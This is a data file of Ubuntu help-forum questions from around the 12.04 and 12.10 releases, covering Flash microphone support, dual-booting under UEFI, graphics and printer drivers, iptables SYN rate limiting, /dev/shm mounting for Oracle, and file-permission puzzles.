240285	is there no support for microphone recording in flash player for linux ?	is there no support for microphone recording in flash player for linux ? my microphone works fine with skype . why is adobe flashplayer unable to use it ? is there no support from adobe ? also : my installed version is from abobe 's .tar.gz . i tried to update flash player using the `` apt for ubuntu '' option , but i got : failed to fetch http : //archive.canonical.com/ubuntu/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.243-0precise1_i386.deb 404 not found [ ip : 91.189.92.191 80 ] failed to fetch http : //archive.canonical.com/ubuntu/pool/partner/a/adobe-flashplugin/adobe-flash-properties-gtk_11.2.202.243-0precise1_i386.deb 404 not found [ ip : 91.189.92.191 80 ] what does that mean ?
240289	12.10 wo n't suspend automatically	my computer is a 64 bit desktop running 12.10 . since upgrading it will not suspend . in my power settings i have it set for suspend after five minutes .
240293	my laptop only boots with the acpi=off parameter . how can i fix this ?	i managed to install ubuntu 12.10 with the option acpi=off , as it did n't work without . now it boots only with this option . is it possible to solve the problem for the need of this option ? with this option it is booting is quite slow . could it be related to the nvidia geforce gt 520m card i have with optimus technology ? maybe its drivers ? my laptop is a one year old aspire 5750g .
240297	rearranging indicators ( dropbox , clementine and recent notifications )	here are my indicators on the top bar . { from left to right , first one is free rapid downloader and second is recent notifications ( jconti ) } i have managed to reorder some of them using the file /usr/share/indicator-application/ordering-override.keyfile [ ordering index overrides ] nm-applet=1 gnome-power-manager=2 ibus=3 gst-keyboard-xkb=4 gsd-keyboard-xkb=5 indicator-sensors=6 indicator-cpufreq=7 jupiter-client=8 classicmenu-indicator=9 caffeine-cup-empty=10 multiload=12 i would now like to place multiload on the complete left . i.e move dropbox , clementine and recent notifications ( jconti ) right i do not need to move free rapid downloader and i 've changed default icons of recent notifications . what are the names of the dropbox indicator , clementine indicator and recent notifications indicator to be used in the ordering-override.keyfile ?
240299	installing ubuntu besides windows 8	i have been trying to install ubuntu ( i tried 12.04lts , 12.10 , 12.10-secure-remix ) using the wubi installer on windows 8 and all the three times ran into the same problem showing some can not find /ubuntu/winboot/wubildr when i tried to start ubuntu . i tried to change the boot settings from uefi to legacy and then my laptop restarted and showed that `` no operating system found '' . i then tried to install ubuntu using a cd and after a lot of effort and using boot repair , etc . i landed into a new trouble . when i select uefi on , the laptop loads windows and windows too does not detect ubuntu . when i select legacy mode , it starts ubuntu , shows me an option to start windows 8 but gives an error showing windows failed to load . so in legacy mode , i am able to use only ubuntu and in uefi mode , i am able to use only win8 . please explain any process of starting windows in legacy mode ( which i tried without any success ) or starting ubuntu in uefi mode .
240300	amd catalyst driver 12.1 kubuntu 12.10 ( 64 bit )	i have an asus n56dp laptop and i have kubutu 12.10 working on it with the default graphics drivers . the system hangs if i use any of the additional drivers suggested by jockey-kde . i am thinking about installing the amd catalyst 12.10 to get better graphics performance . the graphics card on my system is radeon hd 7730 m. has anyone tried this out and want to share their experience ? thanks ,
240302	when installing several programs in a row , some needed my password , some did n't . why ?	when i was installing several programs from the ubuntu software center , i installed several of them in a row ; for some , i was asked to provide my password ; for others , i was n't . when i removed them , the same programs that needed a password for installation , needed a password for removal ; the others did n't . why is that ? i thought i needed to provide my password each time i make any changes . if not , does n't my system become insecure ? many thanks !
240304	'no active partition found ' error after install of ubuntu 12.04 ?	i just installed the ubuntu from usb with root swap and home partition . i also set to install boot loader to the same partition with root . however i can not boot the ubuntu after intallation and it give 'no active partition found ' error . how could i solve that problem ? thanks anyway ...
240309	12.04 not printing correctly on lexmark x340	after upgrading from 11.10 to 12.04 , i have printing issues with lexmark x340 : printing from libreoffice or a pdf file : if the document is more complex ( longer than 2 pages ) , the first page is printed correctly , followed by several of pages with some hieroglyphics . this can only be stopped by switching the printer off and then on again . in case of simple documents , the first print usually comes out ok. then , if another print is requested , the story begins again : unwanted characters , on many pages . to overcome this problem , i now do the following : print a document , switch the printer off and back on , print again , and so on ... does anyone has a fix ? thanks in advance . best regards gyorgy
240310	how can i back up my boot drive ?	i am running xbmc on an ubuntu minimal install . there is no desktop environment installed . is there a way i can clone my boot drive to a usb drive so that it can be restored at a later date if needed ?
240313	ubuntu 12.10 no network devices detected	i installed ubuntu 12.10 on my dell vostro 3460 and no network devices are detected ( ethernet and wireless ) . when i run lspic , i see : 1:00.0 network controller : broadcom corporation bcm43142 821.11b/g/n ( rev 01 ) 2:00.0 ethernet controller : atheros communications inc. ar8161 gigabit ethernet ( rev 10 ) any ideas ? keep in mind my only internet connection is just another computer i 'm using , so for installing stuff from the internet i would need to first download them , put them on a usb stick and then copy them and install on the dell computer . -a [ edit ] one more thing , 'rfkill list all ' lists only the bluetooth device . [ edit ] ethernet works now , wireless driver installed , but not functioning .
240316	xubuntu does not recognise second identical ati graphics card	i have 2 ati graphics cards and 4 identical samsung lcds ( 2xdvi on each card , no crossfire though the bridge is connected ) , and i am hoping to configure them in the following manner . currently , lcd 1 and 2 work , however 3 and 4 are not recognised . i dual boot windows 7 and all 4 lcds work fine in this arrangement , so i think that rules any bios misconfiguration out . i am unsure if the fglrx drivers are registering for the second card . $ fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6800 series opengl version string : 4.2.11903 compatibility profile context $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati barts xt [ radeon hd 6800 series ] 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati barts xt [ radeon hd 6800 series ] $ grep 'output . *connected ' /var/log/xorg.0.log [ 5.160 ] ( ii ) radeon ( 0 ) : output displayport-0 disconnected [ 5.160 ] ( ii ) radeon ( 0 ) : output hdmi-0 disconnected [ 5.160 ] ( ii ) radeon ( 0 ) : output dvi-0 connected [ 5.160 ] ( ii ) radeon ( 0 ) : output dvi-1 connected $ cat /etc/x11/xorg.conf # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # card1 -- -- -- -- -- -- -- -- -- -- -- -- -- # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # devices -- -- -- -- -- -- -- -- -- -- -- - section `` device '' identifier `` card1 '' driver `` fglrx '' option `` monitor-dfp6 '' `` left '' option `` monitor-dfp7 '' `` center '' busid `` pci:1:0:0 '' endsection # monitors -- -- -- -- -- -- -- -- -- -- -- - section `` monitor '' identifier `` left '' option `` vendorname '' `` samsung '' option `` modelname '' `` bx2450 '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' # option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` center '' option `` vendorname '' `` samsung '' option `` modelname '' `` bx2450 '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' # option `` position '' `` 1920 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection # screens -- -- -- -- -- -- -- -- -- -- -- - section `` screen '' identifier `` screenleft '' device `` card1 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 1920 1080 depth 24 endsubsection endsection section `` screen '' identifier `` screencenter '' device `` card1 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 1920 1080 depth 24 endsubsection endsection # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # card2 -- -- -- -- -- -- -- -- -- -- -- -- -- # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # devices -- -- -- -- -- -- -- -- -- -- -- - section `` device '' identifier `` card2 '' driver `` fglrx '' option `` monitor-dfp6 '' `` right '' option `` monitor-dfp7 '' `` top '' busid `` pci:2:0:0 '' endsection # monitors -- -- -- -- -- -- -- -- -- -- -- - section `` monitor '' identifier `` right '' option `` vendorname '' `` samsung '' option `` modelname '' `` bx2450 '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' # option `` position '' `` 3840 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` top '' option `` vendorname '' `` samsung '' option `` modelname '' `` bx2450 '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' # option `` position '' `` 1920 1080 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection # screens -- -- -- -- -- -- -- -- -- -- -- - section `` screen '' identifier `` screenright '' device `` card2 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 1920 1080 depth 24 endsubsection endsection section `` screen '' identifier `` screentop '' device `` card2 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 1920 1080 depth 24 endsubsection endsection # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # server -- -- -- -- -- -- -- -- -- -- -- -- - # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- section `` serverlayout '' identifier `` mylayout '' screen `` screenleft '' 0 0 screen `` screencenter '' 1920 0 screen `` screenright '' 3840 0 screen `` screentop '' 1920 1080 endsection section `` serverflags '' # option `` xinerama '' `` on '' endsection
240318	nautilus-actions 3.1.4 - action only for sftp files	i wrote a script that deletes remote files with root privileges . how to make my menu appears only when i select a file and not a directory ? and only for sftp files and not for local files ?
240320	hdmi 1920x1080 cut off screen	i have my pc plugged into a 1920x1080 tv with an hdmi cable . the problem is is that lots of my screen has been cut off like the panel at the side and the shutdown area . i have checked in the settings that it is definitely at 1920x1080 and does not give me an option to go higher . i am running on the intel 4000 graphics on an asus p8z77 i deluxe board . thanks .
240321	can not see form designer in monodevelop/quantal quetzal	i 'm running quantal quetzal , and installed monodevelop from synaptic , also gtk-sharp2 . synaptic installed monodevelop 3.0.3.2 . everything working fine in the ide with one exception : when i create a gtk # 2.0 project , i can not see the form designer in the ide . i can build the project and run it and the winform launches , but in the designer i can see only source code , not the gui designer , when i open the mainwindow unit , even though view is set to visual design . i must be missing a package ? what am i doing wrong ? what am i missing that needs to be installed ?
240324	i 've disabled periodic checks for updates . why does it still do so ?	i use ubuntu 12.04.1 64bit . i always used my update settings set to `` never check '' and then manually check for updates when i need to . but the last week or so i saw that ubuntu started checking for updates automatically every day . i went to the settings but is was still set to `` never check '' . so i changed it to `` every two days '' to see if that will help . now it check 2 to three times per day automatically . why is it ignoring my update settings and automatically checks so randomly every day ? edit : did the following with the help of gertvdijk : on request checked if i have unattended-upgrades installed and i have . used suggested command sudo dpkg-reconfigure -plow unattended-upgrades to configure it to not do automatic updates . proceeded to check file /etc/apt/apt.conf.d/10periodic for the following settings : apt : :periodic : :update-package-lists `` 0 '' ; apt : :periodic : :download-upgradeable-packages `` 0 '' ; apt : :periodic : :autocleaninterval `` 0 '' ; apt : :periodic : :unattended-upgrade `` 0 '' ; and all is at zero after the configuration above . will monitor and provide feedback if this resolved the problem . edit 2 : none of the above worked . my system just informed me of updates that is available , so it still is automatically checking .
240326	disable initramfs in order to accelerate boot process	i was wondering if it is possible to disable initramfs on an ext4 partition in order to reduce the time it takes ubuntu ( 12.04 ) to boot . see source here ! instead , setting up the root device directly to sda1 ( in my case ) and adding a parameter about the correct filesystem type to use , may cause the kernel to boot the system without initramfs and a few seconds faster . is this correct ? unfortunately i do not know where to put this lines in ubuntu : linux /vmlinuz-3.2.0-35.x86_64 root=/dev/sda1 rootfstype=ext4 quiet # initrd /initramfs-3.2.0-35.x86_64.img
240328	brightness hot keys on thinkpad t420 with ubuntu 12.10	i have been testing ubuntu 12.10 on my thinkpad t420 ( with nvidia optimus , yes ) and over the last couple of days i 've made 10-20 clean installs . every install i 've ( until now ) has had the brightness hot keys working out of the box . but this morning i 've made two new clean installs ( using the same media as always ) and not the hot keys do not work out of the box . i am able to adjust the brightness by going to `` system settings '' - > `` brightness and lock '' , but the hot keys ( fn + home/end ) simply does not work . i have installed nothing but bare ubuntu ( no nvidia drivers , nothing ) . i am certain this used to work for me ( clean install , hot keys working of the box ) because i ran a series of power tests using `` powerstat '' on both clean installs , installs with drivers , installs with bumblebee etc . and they were all made with minimum brightness - hence they hotkeys have worked for me on clean installs just a couple of days ago . what could have gone wrong and how to i start to debug ?
240334	installing a new device	i seem to have a mental block about installing drivers . installing software from the download centre is easy , so let me give an example- i want to use a different wireless usb adaptor . computer works fine with old one , but does not seem to see new one . if i try to install drivers from the disc , it tells me i do not have permission . help files tell me to type commands in . the only place i can see to type commands is on the dash home screen and nothing is recognised . i have no doubt that installing a new piece of hardware is as easy as windows if you know how- but i do n't . is there a complete moron 's guide to installing hardware in ubuntu ?
240335	during installation , do i need an ethernet cord to connect to the internet ?	i have a dell inspiron 1525 and was wondering if i needed an ethernet cable to connect to the internet during installation of ubuntu ? or is an ethernet cable required to connect for the first time after installation ?
240338	how to setup canon inkjet pixma ip 1300 ?	i am unable to setup canon inkjet pixma ip 1300 on quantal amd64 . the things i have tried : shut down and disconnect the printer before installing packages . added the ppa : michael-gruz/canon repository to synaptic and installed the cnijfilter-pixmaip1000series package ( there is no package for 1300 so i installed the nearest one ) . the ppa repository does not have packages for quantal , so had to manually update the repository definition to `` oneiric '' and refreshed it before downloading . restarted cups via sudo service cups restart . connected and switched on the printer . opened all settings - > printers to add a printer . there are 2 entries - one for the standard usb printer , another for `` usb printer - with status readback for canon ij '' with device url as cnijusb : /dev/usb/lp1 . have selected this as per direction in ubuntu community forum . for manually entering a .ppd file i select /usr/share/cups/model/cnpixmaip1000.ppd . error message : failed to read ppd file . possible reason follows : /usr/share/cups/model/cnpixmaip1000.ppd : fail*fail* unable to open ppd file - no such file or directory on line 0 . on checking i find that cnpixmaip1000.ppd file in /usr/share/cups/model is a symbolic link pointing to /usr/share/ppd/cnpixmaip1000.ppd . however the later file does not exist . there are no other ppd files installed . ps : printing works fine with the shareware turboprint for linux . so , there 's nothing wrong with the printer .
240340	will adobe reader 9.5.3 be offered in partner repository ?	will there be an ubuntu package in the canonical partner repository for the security update adobe reader 9.5.3 ? ftp : //ftp.adobe.com/pub/adobe/reader/unix/9.x/9.5.3/enu/adberdr9.5.3-1_i386linux_enu.deb
240342	is unity 2d ever coming back ?	i have some computers which only operate on unity 2d because of their hardware , so i rely on unity 2d and ubuntu 12.04 . in the future i could use gnome shell , i could use unity 3d via llvmpipe ( which is real slow ) or even lxde , but i just love unity 2d and its speed . is it ever coming back for newer ubuntu releases ?
240346	how to keep only ubuntu-minimal ?	how can i remove all packages from ubuntu and make sure ubuntu-minimal will not be lost ?
240348	vista wont boot after 12.04 install	i have dell inspiron 1525 ; installed ubuntu 12.04 lts and everything seemed well . then did a reboot and tried to get into vista - but i get a black screen with working cursor and nothing else . i tried boot repair and it said : boot successfully repaired . please write on a paper the following url : http : //paste.ubuntu.com/1523488/ if you still experience boot problems , indicate this url to : boot.repair @ gmail.com or to your favorite support forum . you can now reboot your computer . however , i am unable to boot into windows vista .
240354	how change behavior to dock pane under ubuntu 12.04 lts ?	i need unset up the trash button on bottom the pane , and set up these for workplaces button . and i prefer for using set up main button on dock , analogically them . i.e . using it for permanently displaying main button on top of the pane . other dock 's button set , - such any application 's buttons who set to dock or present them as running apps now , - it 's can be present as floating and rolling , as it 's have been uses currently . how can i change this behavior on the dock under ubuntu 12.04 lts ? any ideas ?
240358	problem with sound in wine and system	i tried to search for my problem , but could n't find the solution ... thus ; i 'm using ubuntu 12.04 64bit , and playonlinux to play guild wars 2 ... rythmbox is always started on pause , as i like to use media buttons to play music whenever i feel like it ... it was all working fine , until ( at some point , and i 'm not sure what happened ) i was not able to play music while i 'm in game ... so , i tried , and came to conclusion that , if i start the game with paused music , i wo n't be able to hear it play when i unpause it ( it actually plays , but without any sound ) ... on the other hand , if i start music and then start the game , i will not be able to get any sound from game , even if i pause the music during the play ... i was looking through sound options in-game and fount out that if i play music before starting the game , my device list will have 3 rows : default device out : hda intel pch - alc889 digital ( ( null ) ) out : hda intel pch - hdmi 0 ( ( null ) ) and if i start the game before music i will have 4 options : default device out : hda intel pch - alc889 digital ( ( null ) ) out : hda intel pch - hdmi 0 ( ( null ) ) out : hda intel pch - hdmi 0 ( ( null ) ) i use classic integrated audio card with 3.5mm audio jack pluged in into my vga tv ... do you have any idea what could be the problem ? thanks .
240360	is there a rule for iptables to limit the amount of syn packets a /24 range of ips can send ?	how can i block entire c class ip blocks when they send too many syn packets to my ubuntu 12.04 server ? example of what i see during a syn flood attack : each different ip only sends 1 syn packet , so the firewall does n't block it . but the range 192.132.209 . * all together is sending a lot of syn packets in a very small time period .
240361	is there a target package list for ubuntu phone ?	i know it 's not released yet . i know it 's subject to change . the question is , if i 'm trying to make one of the first 100 apps for ubuntu phone that are n't horrible , what libraries can i expect to depend on ? like if someone at canonical working on the project has a dev-phone , what is the output of dpkg -- get-selections ? i think getting at least a `` probably this '' list out there might get people developing less trivial applications for the phone earlier , even if the list is subject to change . update ubuntu touch landed ... so maybe a package list ?
240363	problem opening some pdf files	i have a pdf form i need to fill in . but i can not open it , the message displayed is : `` to view the full contents of this document , you need a later version of the pdf viewer '' , plus a link to adobe . i tried with konqueror , pdfedit and xpdf . please advise .
240365	installing adobe acrobat reader firefox plugin ubuntu 12.10	i want to install adobe acrobat reader plugin in ubuntu 12.10 . i tried enabling medibuntu and searched for mozilla-acroread and acroread-plugins , but the search yielded no results . i have adobe acrobat reader installed using the debian package . one more method i tried is to open adobe acrobat reader edit - > preferences - > internet and then give the browser executables ( /usr/bin/firefox ) and html rendering library ( /usr/lib/firefox )
240372	how to recover data from ext4 partitions ?	i 've removed an old hdd from a computer and to install in another computer to use for data storage ( personal files , specifically tv series episodes , not system files ) and the file system that i 've used was the ext4 , then , for some reason i decided to install another operating system in this hdd , i used the same file system for this os ( ext4 ) . but then i realized that this hdd , had a lot of tv series episodes that i forgot to burn into dvds . now i 'd like to recovery this old data . there is any software with gui and if possible native , available to ubuntu , to perform this task ? this is the output of sudo fdisk -l for that disk : disk /dev/sdb : 20.0 gb , 20019314176 bytes 255 heads , 63 sectors/track , 2433 cylinders , total 39100223 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x21033f16 device boot start end blocks id system /dev/sdb1 * 63 36132875 18066406+ 83 linux /dev/sdb2 36134910 39098367 1481729 5 extended /dev/sdb5 36134912 39098367 1481728 82 linux swap / solaris
240375	does this need a desktop environment to run ?	i have a htpc running an ubuntu minimal os installation and xbmc . no desktop environment is installed - the computer boots straight to xbmc . i want to install a couple of old emulators and run it from the command line using xbmc . on the requirements page of several emulators , it says they need gtk . does this mean they wo n't work without installing a desktop environment ?
240377	can i use intel hd 4000 graphics and discrete radeon hd for dual monitors ?	on windows i have a dual monitor setup . i have one monitor connected directly to the motherboard , running off of intel hd 4000 graphics . i have another monitor connected directly to my radeon hd 7850 . i can simply install both drivers and they will not conflict with each other . i was wondering if this would be possible to setup under ubuntu . i have seen questions about `` hybrid graphics '' but they all pertain to only using one display adapter at a time , and swapping between them . i want to use both display adapters at the same time , one for each monitor .
240381	ndiswrapper problems	i just got a fresh install of 64-bit ubuntu 12.04 and i had no internet . i got ndiswrapper ( just ndiswrapper , not utils or anything ) , i downloaded the drivers for my adapter ( 050d:6050 ) from the belkin support website , and installed them . i installed the vista drivers , did all the iwconfig , modprobeing , etc ... and i got nothing . i saw a thread telling about blacklisting rt2500usb and similar items , and still , nothing . so i went to install the xperia drivers , did the same , and still nothing . iwconfig was empty both times . please help me , i do n't know how to proceed with this .
240384	how much space does ubuntu use on a persistent pendrive with the updates ?	this might have been asked here before ... ... but i am wondering how much disk space on my pendrive an updated ubuntu 12.10 os will take up . i have reserved 3.5 gb for it but it gave me an error message during the update that that wasnt enough . i want to know this so that i may choose the adequate pendrive size .
240386	how do i enable hardware accelerated video in vlc with intel hd 4000 gpu ?	i am running ubuntu 12.10 on a dell latitude e5530 , and i am unable to get hardware accelerated video decoding running in vlc player . i 've ticked the hardware acceleration option in the settings of vlc , installed all libva , libdrm and vaapi related packages , yet the cpu usage indicates me it 's still not active . the cpu usage during the playback of a 720p video is 40-80 % , where i would expect to see a lot lower usage on my machine . can anyone give me some advice on how to get it working ? the output of vainfo is : libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so libva : va_opendriver ( ) returns 0 vainfo : va-api version : 0.32 ( libva 1.0.15 ) vainfo : driver version : intel i965 driver - 1.0.17 vainfo : supported profile and entrypoints vaprofilempeg2simple : vaentrypointvld vaprofilempeg2main : vaentrypointvld vaprofileh264baseline : vaentrypointvld vaprofileh264baseline : vaentrypointencslice vaprofileh264main : vaentrypointvld vaprofileh264main : vaentrypointencslice vaprofileh264high : vaentrypointvld vaprofileh264high : vaentrypointencslice vaprofilevc1simple : vaentrypointvld vaprofilevc1main : vaentrypointvld vaprofilevc1advanced : vaentrypointvld i 've tried to play 720p mpg , mp4 and wmv movies , yet none of them ran hardware accelerated . the codecs of the tested movies are : mpeg : h264-mpeg 4-avc ( part 10 ) ( avc ) ( resulting 80 % cpu usage , full hd resolution ) mp4 : mpeg 4 video ( mp4v ) ( 16 % cpu usage , 720p ) wmv : windows media video 7 ( wmv1 ) ( 16 % cpu usage , 720p resolution ) taking a look at system monitor , i can see , that all four cpu threads ( talking about a i5-3210m dual-core processor ) are nearly equally stressed , so the above mentioned 16 and 80 % cpu usage is distributed among the threads ) .
240390	why is power statistics showing grossly incorrect battery power ?	energy when full - 231.7 wh energy ( design ) - 81.2 wh this also results in an incorrect value for percentage - 31.3 % this also conflicts with time to full field ( thankfully ! ) i have never seen this difference before . why is this happening ? can this damage the battery or my laptop in any way ? my laptop is asus u32u - rx012d . update : bug reported : https : //bugs.launchpad.net/ubuntu/+source/gnome-power-manager/+bug/1099039
240394	lm-sensors ca n't find any sensors on dell optiplex gx620	the small form factor pc is known to overheat so i installed indicator-sensors to monitor temperatures . it told me i needed to run sensors-detect . but running it did n't come up with anything . is this mainboard not supported ? i ca n't find any info .
240396	will my iphone 5 work in 12.10 ?	if i install ubuntu 12.10 how did i manage my music on my iphone 5 ? does rhythmbox work with iphone ? or anything else ? music is important to me and i ca n't seem to find any information on this , would anyone be able to help please kind regards
240400	i have installed ubuntu using windows installer , now i want to uninstall windows xp , how do i do that ?	i have installed ubuntu using windows installer , now i want to uninstall windows xp , how do i do that , please ?
240401	ubuntu 12.04 keyboard shortcut without use of modifier key	currently it seems you can not enter keyboard shortcut combinations without the use of a modifier key . is there any way to circumvent this , ie . a configuration file that i could manually enter these combinations into ?
240402	submit merged debian package for inclusion in ubuntu	i 'm currently working to update the version of autogen shipped with ubuntu from 1:5.12-0.1ubuntu2 in the repositories to 1:5.17.1-1 in debian . the merge has been completed on my computer and the commit made , but i 'm not sure how to proceed from here . for context , i did the following steps : bzr branch lp : ubuntu/autogen raring bzr merge debianlp : experimental/autogen resolve merge conflicts ( there only was one in debain/control anyway ) dch -i bzr commit -m `` new debian version '' bzr builddeb -s -- package-merge that last step resulted in a successful build , but now i 'm a bit stumped as to my next move . the build produced the following files : build-area/autogen_5.17.1-1ubuntu1.debian.tar.gz build-area/autogen_5.17.1-1ubuntu1.dsc build-area/autogen_5.17.1-1ubuntu1_source.build build-area/autogen_5.17.1-1ubuntu1_source.changes build-area/autogen_5.17.1.orig.tar.xz i know i can do bzr push lp : ~notgary/autogen/fix-1098872 and propose the merge that way , but i was wondering if there 's anything i need to do with the files produced by the build .
240403	ubuntu 12.10 does not boot on dell d600	i have an old dell latitude d600 using usb boot ubuntu 12.10 . when booting , it said that i have the wrong kernal for my cpu . very odd , ubuntu 11.10 was working just fine . i tried the 12.10 on another pc ( newer dell ) , and it works . not sure what is going on here .
240412	how can i modify the default behaviour of ubuntu 12.04 ( & 12.10 ) to prevent a symbolic link from /dev/shm to /run/shm ever being created on boot up ?	whilst installing oracle 11gr2 express edition on ubuntu 12.04 by following the oracle 11gr2 express edition on linux ubuntu 11.10 howto and have encountered the oracle memory target problem with /dev/shm ( as documented in section 7. of that guide ) since /dev/shm is now implemented by default as a symbolic link as noted in the ubuntu 11.10 release notes from /dev/shm to /run/shm . the symbolic link is incompatible with what oracle expects and this results in an oracle error ( ora-00845 : memory_target ) on database startup . section 7 ) of the 'oracle 11gr2 express edition on linux ubuntu 11.10 howto ' documents a startup script /etc/init.d/oracle-shm that is meant to configure /dev/shm to use ubuntu’s /run/shm , however this does not appear to have the desired effect on ubuntu 12.04 and /dev/shm is not mounted as expected - presumably it did work on 11.10 . although this has already been noted and various solutions proposed i chose to work around the problem in a slightly different way by adding an entry to /etc/fstab and modifying the /etc/init.d/oracle-shm script as follows : adding an entry for the shared memory temporary file system to /etc/fstab , say ( for a 2 gigabyte file ) shm /dev/shm tmpfs size=2g 0 0 changing the mount line in /etc/init.d/oracle-shm from : rm -f /dev/shm mkdir /dev/shm mount -b /run/shm /dev/shm to simply rm -f /dev/shm mkdir /dev/shm mount /dev/shm regardless , all the proposed solutions involve undoing the default ubuntu behaviour at bootup , by first removing the symbolic link and then implementing the desired behaviour . i would like to be able to setup the shared memory file system once and for all by : adding an entry for the shared memory temporary file system to /etc/fstab , say ( for a 2 gigabyte file ) shm /dev/shm tmpfs size=2g 0 0 remove the existing symbolic link to /dev/shm and create as a directory , as sudo . rm –f /dev/shm mkdir /dev/shm mounting the shared memory temporary file system mount /dev/shm this all works fine until you reboot , at which point the symbolic link from /dev/shm to /run/shm re-appears instead of /dev/shm being mounted as a shared memory temporary file system . here’s the question then . how can i modify the default behaviour of ubuntu 12.04 ( & 12.10 ) to prevent a symbolic link from /dev/shm to /run/shm ever being created in the first place on boot up ? action=show & redirect=oneiricocelot/technicaloverview # upgrades
240415	problems after installing ubuntu 12.10 and grub	i installed everything correctly as mentioned here . but after completing the installation , nothing changed in my grub . ( there were only past releases of ubuntu - 10.10 and 12.04 as before ) . how i can start to use 12.10 ?
240418	how to install ubuntu from usb before the existing os is booting	i have a windowsxp os , but the system down and i ca n't open it , so i decide to install ubuntu . i installed it in my usb how to force the computer to boot and read from flash and install the ubuntu , without opening the windowsxp system ? ?
240420	fitbit not syncing	how do i troubleshoot our fitbit that does n't seem to sync ? i installed using the ppa on a lenovo e420 running ubuntu 12.04 . running sudo start libfitbit_client does n't seem to do anything either . syncs fine under windows 7 .
240421	how to create a .deb file with dependency ?	i have a game made with the lăve framework and i want it into a .deb file so it can be easily installed by others and easily findable through the unity dash for example . i also have the lăve framework love_0.7.2.deb which i want to be in the deb file also somehow . files that i have : * game_icon.png * game .desktop file * the_game.love * love_0.7.2.deb could someone explain to me how to do this ? this is how it look now http : //www.speedyshare.com/3qhhq/not-pacman.tar.gz
240422	which installation drive to choose ?	i 'm using the ubuntu installer should i pick ( c : ) [ 39gb free ] or ( d : ) [ 89gb free ] ? i keep all ( 0.5gb ) of files on ( d : ) and keep installed programs on ( c : ) . will anything happen to my files if i choose ( d : ) or is there any chance of my files being lost ? thanks
240424	why ca n't i delete a file even though i have write permissions ?	the shell session should say everything : i ca n't delete a file ( movie.avi ) although i have write permissions . i do n't get what the problem is . have i missed something ? confus @ homeserver : /home/narur $ id uid=1000 ( confus ) gid=1000 ( confus ) groups=1000 ( confus ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,106 ( lpadmin ) ,117 ( sambashare ) ,118 ( debian-transmission ) ,1001 ( narur ) confus @ homeserver : /home/narur $ ll | grep movie.avi -rw-rw -- -- 1 narur narur 1,4g jan 11 09:42 movie.avi confus @ homeserver : /home/narur $ rm movie.avi rm : can not remove `movie.avi ' : permission denied # # # # some infos on my system : confus @ homeserver : /home/narur $ lsb_release -dc description : ubuntu 12.10 codename : quantal confus @ homeserver : /home/narur $ uname -a linux conserve 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 x86_64 x86_64 x86_64 gnu/linux
240427	chrome flash sound gets broken and only a system restart fixes it	i use google chrome 24.0.1312.52 ( it happens on older chrome versions too ) on ubuntu precise with shockwave ( pepper ) flash 11.5 r31 . occasionally the sound of the flash player breaks and remains broken until i restart my system . this happens especially often when i play videos from epicfail dot com . like every second video or so . by `` broken '' i mean that it sounds like ... er ... well ... farting . while it does seem to have something to do with the actual video sound ( in terms of volume for example ) it is absolutely unintelligible . when the flash sound is broken , it is broken for every flash instance - videos , games , etc . restarting the browser or shift-esc - > plugin-shockwave-flash- > end-process does not fix it . the sound in other applications ( rhythmbox , movie player , installed games ) works fine . only flash seems to be affected . restarting the computer fixes it ( until it gets broken again ) . so far it has n't happened if i 'm watching youtube videos or playing kongregate games . epicfail is the surest way to break it , and it does happen every once in a while after a wimp video . so , has anyone experienced this ? is there a way of fixing it , or if not , at least getting it to work again without having to restart my machine ?
240430	how to resolve `unable to locate package` error ?	i am running ubuntu 12.04 lts . i have edited /etc/apt/sources.list to add deb http : //tinyos.stanford.edu/tinyos/dists/ubuntu precise main . but when i try to install tinyos ; i get the following error : shahid @ shahid-lenovo-g550 : ~ $ sudo apt-get install tinyos reading package lists ... done building dependency tree reading state information ... done e : unable to locate package tinyos how do i resolve this ?
240431	is there a way i can rename trash to crap ?	i was trying to rename the folder trash to crap . i did this i first ran cd /home/username/.local/share/ now my present working directory is /home/username/.local/share then when i typed ls i could see the folder trash . then i renamed it to crap by typing mv trash crap and then when i again typed ls i could see that the folder was renamed to crap but on the launcher when i open the trash folder it 's still named as trash and not crap . why is that so ?
240433	x11 detects touchscreen as mouse	i use ubuntu 12.10 and the touchscreen works almost correctly . the only problem is that in gtk3 programs you can , if x knows you have a touchscreen , use kinetic scrolling . i ca n't do this because x detects it as a mouse . so my question is how do i make x know that the `` mouse '' is in fact a touchscreen ? the touchscreen is an usb : 1bfd:1688 touchpack resistive touch screen
